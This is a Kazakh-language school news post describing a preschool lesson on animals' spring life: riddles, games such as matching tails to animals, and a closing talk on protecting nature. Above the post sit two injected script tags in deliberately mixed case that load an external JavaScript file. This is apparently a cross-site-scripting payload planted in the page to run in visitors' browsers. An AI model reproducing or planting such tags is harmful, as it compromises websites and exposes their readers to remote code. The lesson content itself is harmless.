<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.05.2017

Ғ.Әбдірахманұлы атындағы Қима орта мектебінің мектепалды даярлық тобы.

Мектепалды даярлық тобында Жаратылыстану пәнінен «Жануарлар мен аңдардың көктемгі тіршілігі» атты тақырыпта өткен сабақтың мақсаты: Жануарлардыңкөктемдегі қоректенуі, күшіктеуі,көбеюі, төлдеуі, мекен-жайы, іс-әрекеттері жайлы мәлімет беру.

Сабақта түрлі аңдар мен жануарлар суреттері пайдаланып, оларға арналған жұмбақтар мен тақпақтар айтылды. «Мен қайда өмір сүремін?», «Мен немен қоректенемін?», «Менің төлім,күшігім қалай аталады?» атты дидактикалық ойындар ойналады. «Менің құйрығымды тап» деген ойында оқушылар әрбір аңның құйрығын тауып,жапсырады.

Қортындылау кезінде, табиғаттағы барлық жан-жануарларды қорғап, қамқорлық жасау қажеттілігі айтылды. Оқушылар көңілді отырып, белсенділік көрсетті. Сабақ соңында барлық оқушылар жалаушамен марапатталды.

Просмотров: 596


Пікір қосу



Деректерді қолтаңбаға қосу